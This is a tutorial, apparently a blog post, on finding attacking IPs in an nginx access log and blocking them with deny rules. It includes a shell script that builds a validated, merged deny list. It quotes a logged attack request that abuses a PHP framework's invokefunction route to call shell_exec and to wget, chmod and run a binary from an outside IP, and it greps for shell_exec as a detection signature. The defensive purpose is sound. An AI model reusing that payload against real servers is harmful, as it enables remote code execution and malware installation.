Using Nginx to block malicious IP access


The access log shows requests with an obvious signature, such as:

156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"

This is probably a vulnerability in an open-source framework: by passing method parameters, the attacker tries to download a specified file and then execute it. Because functions such as shell_exec are dangerous, they are disabled by default in php.ini.


Match that signature, extract the client IPs, deduplicate them and write them to a file:

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips


Edit the nginx configuration and include the file inside the location block:

$ cat blockips > /etc/nginx/conf.d/blockips.conf


location / {
    include /etc/nginx/conf.d/blockips.conf;
    xxxx;   # the location's other directives
}


Edit blockips.conf so that each line starts with "deny " and ends with ";" (Vim substitutions):

%s/^/deny /g
%s/$/\;/g


Reload nginx; requests from these IPs now get a 403:

# host mode
$ nginx -s reload
# docker mode
$ docker-compose up -d --force-recreate nginx
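The extraction and deny-list steps above as one re-runnable shell script, added here as an example and not part of the original post; the sample log lines, the 10.0.0.7 and 999.1.1.1 addresses, the signature string and the function names are constructed for illustration. It goes beyond the post in two ways: it checks that each extracted field is a well-formed IPv4 address before it can reach the nginx configuration, and it merges with an existing blockips.conf instead of overwriting it.

```shell
#!/bin/sh
# Added example: turn access-log hits on an attack signature into an nginx deny list.
# Everything below is constructed for illustration; SAMPLE_LOG is not real traffic.

# build_blocklist LOGFILE SIGNATURE
# Prints one "deny A.B.C.D;" line per distinct client IP whose request contains SIGNATURE.
# Only well-formed IPv4 addresses pass, so a malformed first field in a log line can
# never end up inside the nginx configuration.
build_blocklist() {
    grep -F -e "$2" "$1" \
      | awk '{print $1}' \
      | grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$' \
      | awk -F. '$1<=255 && $2<=255 && $3<=255 && $4<=255' \
      | sort -u \
      | sed 's/^/deny /; s/$/;/'
}

# merge_blocklist EXISTING_CONF NEW_LIST
# Union of an existing blockips.conf and a freshly generated list, so re-running the
# pipeline adds new addresses instead of overwriting the ones blocked earlier.
merge_blocklist() {
    cat "$1" "$2" | grep -E '^deny [0-9.]+;$' | sort -u
}

# Constructed sample log (nginx combined format, abbreviated request strings).
SAMPLE_LOG="$(mktemp)"
EXISTING_CONF="$(mktemp)"
trap 'rm -f "$SAMPLE_LOG" "$EXISTING_CONF"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
156.203.12.198 - - [01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/invokefunction&vars[0]=shell_exec HTTP/1.1" 400 166 "-" "-"
10.0.0.7 - - [01/Dec/2019:17:41:00 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
156.203.12.198 - - [01/Dec/2019:17:42:10 +0800] "GET /index.php?s=/index/invokefunction&vars[0]=shell_exec HTTP/1.1" 400 166 "-" "-"
999.1.1.1 - - [01/Dec/2019:17:43:00 +0800] "GET /?vars[0]=shell_exec HTTP/1.1" 400 166 "-" "-"
197.33.38.103 - - [01/Dec/2019:17:44:00 +0800] "GET /?vars[0]=shell_exec HTTP/1.1" 400 166 "-" "-"
EOF
# Constructed "already deployed" blockips.conf with one address blocked earlier.
printf 'deny 41.36.20.93;\n' > "$EXISTING_CONF"

# Stand-alone run: generate the list for the sample log and merge it with the existing file.
NEW_LIST="$(mktemp)"
build_blocklist "$SAMPLE_LOG" 'vars[0]=shell_exec' > "$NEW_LIST"
merge_blocklist "$EXISTING_CONF" "$NEW_LIST"
rm -f "$NEW_LIST"
```

Write the merged output to /etc/nginx/conf.d/blockips.conf and run `nginx -t` before reloading, so a bad line is caught before it takes the server down.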


The malicious IPs observed were written to blockips.conf as one deny directive per address.



Link: https://www.cnblogs.com/farwish/p/12080630.html
